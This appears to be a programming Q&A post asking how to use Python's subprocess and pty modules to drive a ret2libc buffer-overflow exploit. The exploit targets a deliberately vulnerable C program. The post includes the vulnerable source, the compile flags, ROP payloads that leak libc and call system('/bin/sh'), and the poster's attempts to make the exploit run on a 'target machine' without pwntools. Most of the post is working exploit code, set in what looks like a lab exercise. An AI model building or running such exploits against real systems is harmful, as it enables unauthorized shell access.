# Buffer overflow script using subprocess

Tags: python, c, subprocess, buffer-overflow

This is my `vuln.c` code:

```c
#include <stdio.h>
#include <unistd.h>

// this function is added because I need that sequence of assembly istructions in the binary file
void oh_look_useful() {
    asm("pop %rdi; ret");
}

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh\n");
    vuln();
    return 0;
}
```

This code has to be compiled with the flag `-no-pie` to make the buffer overflow exploitable, for example:

```
gcc vuln.c -no-pie -o vuln
```

So running the C program, it does a print, then wait for user input and then another print occurs. My python exploit has to send a payload which has to leak the libc base address, restart the program and then make a call to `system('/bin/sh')`. A good explaination on how it's possible can be found [here](https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/), but for this particolar code the payload that make the leak and restart the program is built as follow:

```py
def p64(x):
    return struct.pack("<Q", x)

# used variables can be found in many ways, such as the previously linked guide
payload = (
    b"A" * 104 +
    p64(pop_rdi_addr) +
    p64(read_got_addr) +
    p64(puts_plt_addr) +
    p64(main_addr)
)
```

Now it's time to send the payload, that's what I tried:

```py
process = subprocess.Popen(
    FILENAME,
    stdin=subprocess.PIPE,
    stdout=subprocess.)

with process.stdin as pipe:
    pipe.write(payload)
process.stdout.readline()
process.stdout.readline()
leaked_data = process.stdout.readline()
leaked_addr = u64(leaked_data.ljust(8, b"\x00"))
print(f"Leaked addr: {hex(leaked_addr)}\n")
```

The correct address is printed. Now the C program is restarted, and it's waiting for another payload. This is the one which is going to call `system('/bin/sh')`. In my case, the working one is:

```py
payload = b'A' * RIP_OFFSET + p64(pop_rdi_addr) + p64(bin_sh_addr)
# If sigseg occurs when sending payload, try to remove following line
payload += p64(pop_rdi_addr + 1)
# but keep this line
payload += p64(system_addr)
```

As before, addresses may be found in several ways.
Now it's time to send payload and get shell:

```py
with process.stdin as pipe:
   pipe.write(payload)
```

but for sure it's not going to work because the `stdin` has been already closed. Then I tried:

- to put everything into the same `with process.stdin as pipe:`, but the script is blocked on the very first `process.readline()`.
- to add a trailing `b'\x0a'` to payload, that is the binary code for '\n', but nothing changed.
- to remove any `with` and use:

```py
process.stdin.write(payload)
process.stdin.flush()
process.stdout.readline()
process.stdout.readline()
```

but nothing changes again.

I also tried:

```py
payload = (
    b"A" * 104 +
    p64(pop_rdi_addr) +
    p64(read_got_addr) +
    p64(puts_plt_addr) +
    p64(main_addr)
)

master_fd, slave_fd = pty.openpty()
ts = termios.tcgetattr(master_fd)
ts[3] &= ~(termios.ICANON | termios.ECHO)
termios.tcsetattr(master_fd, termios.TCSANOW, ts)

process = subprocess.Popen(
    FILENAME, stdin=slave_fd, stdout=slave_fd,
    preexec_fn=lambda: os.close(master_fd))
try:
    os.close(slave_fd)
    master = os.fdopen(master_fd, 'rb+', buffering=0)
    print('first read')
    print(repr(master.readline()));
    master.write(payload); master.flush()
    print(repr(master.readline()));
    leaked_data = master.readline();
except Exception as e:
    print("Exception occurs:")
    print(str(e))
    exit(-1)
    
leaked_addr = u64(leaked_data.ljust(8, b'\x00'))
```

based on [this more general question](https://stackoverflow.com/questions/77802033/c-program-and-subprocess/77807014?noredirect=1#comment137172674_77807014), but I got exception:

```
python script.py
Starting leaking...
first read
b'Try to exec /bin/sh\r\n'
b'No shell for you :(\r\n'
Exception occurs:
[Errno 5] Input/output error
```

The error occurs when the script tries to read the leaked address. In the last scenario, I'm not able to realize if the C program crashes before leak address or if the problem is in the python script. I'm sure that payloads are correct, because I've already written the same script using the `pwntools` library and it works, but since the script has to run into the target machine and `pwntools` is not built-in, then I want to prepare a more general one which only use built-in libraries.

Another thing to keep in mind is that, in the end of the script, I have to continuously interact with the spawned bash, then the stdin/stdout of the process has to be conencted to the python script.

Then my question: how can I get the subprocess correctly communicate with the C program?